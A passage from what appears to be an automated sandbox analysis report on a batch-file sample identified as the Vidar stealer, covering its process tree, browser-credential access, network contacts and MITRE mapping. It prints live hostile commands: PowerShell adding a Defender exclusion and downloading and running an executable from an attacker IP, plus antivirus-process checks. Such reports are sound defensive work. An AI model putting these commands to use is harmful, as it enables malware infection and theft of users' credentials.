                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmdJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E AuthorizationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.comJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired mJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com mJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_007514AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,26_2_007514AE
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00751FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,26_2_00751FB0
                    Source: Inf.com, 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp, Name.22.dr, Inf.com.15.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Inf.comBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00710A08 cpuid 26_2_00710A08
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0074E5F4 GetLocalTime,26_2_0074E5F4
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0074E652 GetUserNameW,26_2_0074E652
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0072BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,26_2_0072BCD2
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,14_2_00406831

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 26.2.Inf.com.41e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Inf.com PID: 6636, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: Inf.comBinary or memory string: WIN_81
                    Source: Inf.comBinary or memory string: WIN_XP
                    Source: Inf.com.15.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                    Source: Inf.comBinary or memory string: WIN_XPe
                    Source: Inf.comBinary or memory string: WIN_VISTA
                    Source: Inf.comBinary or memory string: WIN_7
                    Source: Inf.comBinary or memory string: WIN_8
                    Source: Yara matchFile source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Inf.com PID: 6636, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Attempt to bypass Chrome Application-Bound Encryption
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 26.2.Inf.com.41e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Inf.com PID: 6636, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00772263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,26_2_00772263
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00771C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,26_2_00771C61

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information11
                    Scripting                    		2
                    Valid Accounts                    		1
                    Native API                    		11
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts3
                    PowerShell                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS35
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
                    Process Injection                    		111
                    Masquerading                    		LSA Secrets1
                    Query Registry                    		SSHKeylogging114
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials231
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion                    		DCSync31
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                    Process Injection                    		/etc/passwd and /etc/shadow11
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581178 Sample: skript.bat Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 71 t.me 2->71 73 sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ 2->73 75 bijutr.shop 2->75 95 Suricata IDS alerts for network traffic 2->95 97 Found malware configuration 2->97 99 Malicious sample detected (through community Yara rule) 2->99 101 10 other signatures 2->101 11 cmd.exe 1 2->11         started        14 msedge.exe 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 111 Suspicious powershell command line found 11->111 113 Tries to download and execute files (via powershell) 11->113 115 Bypasses PowerShell execution policy 11->115 117 Adds a directory exclusion to Windows Defender 11->117 19 putt.exe 18 11->19         started        21 powershell.exe 25 11->21         started        24 powershell.exe 14 16 11->24         started        34 2 other processes 11->34 119 Maps a DLL or memory area into another process 14->119 28 msedge.exe 14->28         started        30 msedge.exe 14->30         started        32 msedge.exe 14->32         started        36 2 other processes 14->36 69 127.0.0.1 unknown unknown 16->69 signatures6 process7 dnsIp8 38 cmd.exe 2 19->38         started        103 Loading BitLocker PowerShell Module 21->103 105 Powershell drops PE file 21->105 42 WmiPrvSE.exe 21->42         started        77 5.252.155.64, 49773, 80 WORLDSTREAMNL Russian Federation 24->77 67 C:\Users\user\AppData\Local\Temp\putt.exe, PE32 24->67 dropped 79 sb.scorecardresearch.com 18.165.220.66, 443, 50066 MIT-GATEWAYSUS United States 28->79 81 googlehosted.l.googleusercontent.com 142.250.181.65, 443, 50039 GOOGLEUS United States 28->81 83 11 other IPs or domains 28->83 file9 signatures10 process11 file12 65 C:\Users\user\AppData\Local\...\Inf.com, PE32 38->65 dropped 109 Drops PE files with a suspicious file extension 38->109 44 Inf.com 38->44         started        48 extrac32.exe 22 38->48         started        50 conhost.exe 38->50         started        52 9 other processes 38->52 signatures13 process14 dnsIp15 89 t.me 149.154.167.99, 443, 49915 TELEGRAMRU United Kingdom 44->89 91 bijutr.shop 188.245.216.205, 443, 49921, 49927 PARSONLINETehran-IRANIR Iran (ISLAMIC Republic Of) 44->91 121 Attempt to bypass Chrome Application-Bound Encryption 44->121 123 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 44->123 125 Tries to harvest and steal browser information (history, passwords, etc) 44->125 54 msedge.exe 44->54         started        57 chrome.exe 44->57         started        signatures16 process17 dnsIp18 107 Monitors registry run keys for changes 54->107 60 msedge.exe 54->60         started        85 192.168.2.6, 443, 49704, 49707 unknown unknown 57->85 87 239.255.255.250 unknown Reserved 57->87 62 chrome.exe 57->62         started        signatures19 process20 dnsIp21 93 www.google.com 142.250.181.68, 443, 49967, 49968 GOOGLEUS United States 62->93

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    skript.bat0%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\putt.exe5%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://5.252.155.64/lem.exe#100%Avira URL Cloudmalware
                    http://5.252.155.64/lem.exe100%Avira URL Cloudmalware
                    http://5.252.155.64/lem.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=ENGI0%Avira URL Cloudsafe
                    http://5.252.155.64/lem.exeUSERPROFILE=C:0%Avira URL Cloudsafe
                    https://bijutr.shop/op100%Avira URL Cloudmalware
                    http://5.252.155.64/lem.exeUSERDOMAIN=user-PCUSERNAME=userUSERPROFILE=C:0%Avira URL Cloudsafe
                    https://bijutr.shop/TE100%Avira URL Cloudmalware
                    http://5.252.155.64/lem.exeProgramW6432=C:0%Avira URL Cloudsafe
                    http://5.252.155.64/lem.exeUSERDOMAIN=user-PCUSERDOMAIN_0%Avira URL Cloudsafe
                    https://bijutr.shop/h$100%Avira URL Cloudmalware
                    http://5.252.155.0%Avira URL Cloudsafe
                    http://5.252.0%Avira URL Cloudsafe
                    http://5.252.155.64/lem.exeUSERDOMAIN=ENG0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bijutr.shop
                    		188.245.216.205
                    		truefalse
                      		high
                      chrome.cloudflare-dns.com
                      		162.159.61.3
                      		truefalse
                        		high
                        t.me
                        		149.154.167.99
                        		truefalse
                          		high
                          ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                          		94.245.104.56
                          		truefalse
                            		high
                            sb.scorecardresearch.com
                            		18.165.220.66
                            		truefalse
                              		high
                              www.google.com
                              		142.250.181.68
                              		truefalse
                                		high
                                ax-0001.ax-msedge.net
                                		150.171.28.10
                                		truefalse
                                  		high
                                  googlehosted.l.googleusercontent.com
                                  		142.250.181.65
                                  		truefalse
                                    		high
                                    clients2.googleusercontent.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      bzib.nelreports.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        assets.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ
                                          		unknown
